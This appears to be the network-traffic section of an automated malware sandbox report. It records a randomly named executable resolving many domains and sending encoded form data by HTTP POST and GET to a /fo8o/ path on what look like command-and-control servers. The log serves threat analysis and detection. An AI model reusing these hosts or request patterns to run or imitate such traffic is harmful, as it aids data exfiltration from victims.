            Aug 2, 2024 13:53:19.009939909 CEST53521581.1.1.1192.168.2.6
            Aug 2, 2024 13:53:32.280333996 CEST5893453192.168.2.61.1.1.1
            Aug 2, 2024 13:53:33.279695034 CEST5893453192.168.2.61.1.1.1
            Aug 2, 2024 13:53:33.287067890 CEST53589341.1.1.1192.168.2.6
            Aug 2, 2024 13:53:38.144359112 CEST53589341.1.1.1192.168.2.6
            Aug 2, 2024 13:53:48.451680899 CEST5013253192.168.2.61.1.1.1
            Aug 2, 2024 13:53:48.486113071 CEST53501321.1.1.1192.168.2.6
            Aug 2, 2024 13:53:56.545798063 CEST5244753192.168.2.61.1.1.1
            Aug 2, 2024 13:53:56.761606932 CEST53524471.1.1.1192.168.2.6
            Aug 2, 2024 13:54:09.936032057 CEST6507053192.168.2.61.1.1.1
            Aug 2, 2024 13:54:10.101701021 CEST53650701.1.1.1192.168.2.6

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Aug 2, 2024 13:50:51.228025913 CEST192.168.2.61.1.1.10xae89Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:50:52.212675095 CEST192.168.2.61.1.1.10xae89Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:07.858867884 CEST192.168.2.61.1.1.10xa978Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:21.685153008 CEST192.168.2.61.1.1.10x13e5Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:35.614331961 CEST192.168.2.61.1.1.10x187aStandard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:48.920150042 CEST192.168.2.61.1.1.10x7d28Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:02.436141968 CEST192.168.2.61.1.1.10xd926Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:16.201751947 CEST192.168.2.61.1.1.10x6195Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:30.108503103 CEST192.168.2.61.1.1.10xc896Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:43.451426983 CEST192.168.2.61.1.1.10x5b6bStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:56.889158010 CEST192.168.2.61.1.1.10xd3adStandard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:10.514247894 CEST192.168.2.61.1.1.10xeb50Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:18.937091112 CEST192.168.2.61.1.1.10x5be2Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:32.280333996 CEST192.168.2.61.1.1.10xc72bStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:33.279695034 CEST192.168.2.61.1.1.10xc72bStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:48.451680899 CEST192.168.2.61.1.1.10xe89cStandard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:56.545798063 CEST192.168.2.61.1.1.10x9045Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
            Aug 2, 2024 13:54:09.936032057 CEST192.168.2.61.1.1.10x273aStandard query (0)www.b301.spaceA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Aug 2, 2024 13:50:52.785023928 CEST1.1.1.1192.168.2.60xae89No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
            Aug 2, 2024 13:50:52.785034895 CEST1.1.1.1192.168.2.60xae89No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:08.196863890 CEST1.1.1.1192.168.2.60xa978No error (0)www.kasegitai.tokyo52.25.92.0A (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:22.053474903 CEST1.1.1.1192.168.2.60x13e5No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:35.631979942 CEST1.1.1.1192.168.2.60x187aNo error (0)www.antonio-vivaldi.mobi46.30.211.38A (IP address)IN (0x0001)false
            Aug 2, 2024 13:51:49.045622110 CEST1.1.1.1192.168.2.60x7d28No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
            Aug 2, 2024 13:51:49.045622110 CEST1.1.1.1192.168.2.60x7d28No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
            Aug 2, 2024 13:51:49.045622110 CEST1.1.1.1192.168.2.60x7d28No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:02.454740047 CEST1.1.1.1192.168.2.60xd926No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:16.450155020 CEST1.1.1.1192.168.2.60x6195No error (0)www.liangyuen528.com15.197.172.60A (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:30.141890049 CEST1.1.1.1192.168.2.60xc896No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:43.534775972 CEST1.1.1.1192.168.2.60x5b6bNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
            Aug 2, 2024 13:52:43.534775972 CEST1.1.1.1192.168.2.60x5b6bNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
            Aug 2, 2024 13:52:57.395076036 CEST1.1.1.1192.168.2.60xd3adNo error (0)www.donnavariedades.com15.197.240.20A (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:10.867156982 CEST1.1.1.1192.168.2.60xeb50Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:19.009939909 CEST1.1.1.1192.168.2.60x5be2No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
            Aug 2, 2024 13:53:19.009939909 CEST1.1.1.1192.168.2.60x5be2No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:38.144359112 CEST1.1.1.1192.168.2.60xc72bServer failure (2)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:48.486113071 CEST1.1.1.1192.168.2.60xe89cName error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
            Aug 2, 2024 13:53:56.761606932 CEST1.1.1.1192.168.2.60x9045No error (0)www.shenzhoucui.com72.52.178.23A (IP address)IN (0x0001)false
            Aug 2, 2024 13:54:10.101701021 CEST1.1.1.1192.168.2.60x273aNo error (0)www.b301.space194.67.71.191A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • www.3xfootball.com
            • www.kasegitai.tokyo
            • www.goldenjade-travel.com
            • www.antonio-vivaldi.mobi
            • www.magmadokum.com
            • www.rssnewscast.com
            • www.liangyuen528.com
            • www.techchains.info
            • www.elettrosistemista.zip
            • www.donnavariedades.com
            • www.empowermedeco.com
            • www.joyesi.xyz
            • www.shenzhoucui.com
            • www.b301.space

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.649720154.215.72.110805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:50:52.805896044 CEST525OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.3xfootball.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.64972352.25.92.0805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:08.206670046 CEST786OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38
            Data Ascii: blWd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
            Aug 2, 2024 13:51:08.821131945 CEST1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:08 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
            Aug 2, 2024 13:51:08.821152925 CEST1078INData Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.64972452.25.92.0805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:10.737643957 CEST810OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 61 50 67 6a 55 6c 57 4c 64 77 4c 39 56 62 4e 69 52 31 31 35 59 66 6a 57 6e 42 41 63 64 55 44 72 35 61 41 7a 63 56 2f 4b 33 69 4f 77 3d 3d
            Data Ascii: blWd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwaPgjUlWLdwL9VbNiR115YfjWnBAcdUDr5aAzcV/K3iOw==
            Aug 2, 2024 13:51:11.366204977 CEST1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:11 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
            Aug 2, 2024 13:51:11.366221905 CEST1078INData Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.64972552.25.92.0805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:13.270243883 CEST1823OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 45 2f 41 56 6c 75 46 42 62 61 65 6d 4f 43 67 30 6b 56 61 66 56 31 48 2b 4a 73 4b 6a 74 4a 72 59 4d 53 6f 77 58 6e 57 61 59 70 41 4c 64 62 4e 47 4e 35 33 62 32 47 63 2f 57 71 46 6a 52 35 78 62 6d 48 78 65 69 51 6f 32 45 61 62 30 4a 6f 6c 4f 46 4d 75 6f 33 2f 39 63 64 79 6e 30 6e 68 4e 4c 56 46 70 4e 72 4d 73 30 30 44 4e 56 7a 57 6d 4b 6c 30 63 58 52 55 4f 77 45 39 73 51 2b 4b 64 73 75 43 68 6e 52 64 44 34 34 7a 64 49 53 30 33 77 48 4a 62 32 66 58 6a 77 32 71 35 35 5a 56 4e 64 61 32 59 [TRUNCATED]
            Data Ascii: blWd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLE/AVluFBbaemOCg0kVafV1H+JsKjtJrYMSowXnWaYpALdbNGN53b2Gc/WqFjR5xbmHxeiQo2Eab0JolOFMuo3/9cdyn0nhNLVFpNrMs00DNVzWmKl0cXRUOwE9sQ+KdsuChnRdD44zdIS03wHJb2fXjw2q55ZVNda2YQVKohE7DA48Al1Ls1G3ckJ6bmm5PbIwFfYhhJWuqRqOccvvso1C25ZE+zb/G6GyONDu40a9xyZFOk1i5kdy6YOxF737AFW5aKBjciPwPW0lfXjqT0Plq9R2RUBktgloVMj6UEVo/s4tz9E1w1tDuaqqjxTRDx1w9YPE2wyQLLjYj3kUUHdbEK9Ptlc9VSB899BW1UKsT/FUeX5X4Hmd7t0Fa3B/YwGWpZnWZy06W065uXfCfSbry0czK10hWa/o6xXsyzfprP80Lb80p05H2FJjnUqKgnXBhSL7HNhS+puhii+dRg/FEaSbYVEfnXeXqoBcZoSDOQSeB8H8W/8IJc2L9Jq4BX+v/ztC8TXNo4vpDNIlyWuSR/jAh7tEGH9lWybVmlBeMYUyRUEFF2BeH3xTaX0FToHkjxiNc5qeYFMxZiB0uRimlRoC1pjAwFzK1HLPvYcB+fcIHq7pJus/IF5FTHnh0/1YNBx5Tmxc9KEm3KwEOXF38bFvpfQ99mYj7Iv2xoKFdgn8Tafw6J0/+SUE2Cu5zYMn+MRNkWvvI/wAMSGlvEeuGhVBXfjl6/XENY5J9R3ySB1FZm3HoIxSmCcNBbCXxfTRQolJR9U5BtM8ic4+eMzC6ktGQm08oL8AzrPZkz7c+lX7TGvvMs3JAF9ov75UC6MHOhE [TRUNCATED]
            Aug 2, 2024 13:51:13.877974033 CEST1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:13 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
            Aug 2, 2024 13:51:13.878010988 CEST1078INData Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.64972652.25.92.0805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:15.802732944 CEST526OUTGET /fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.kasegitai.tokyo
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:16.663819075 CEST1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:16 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
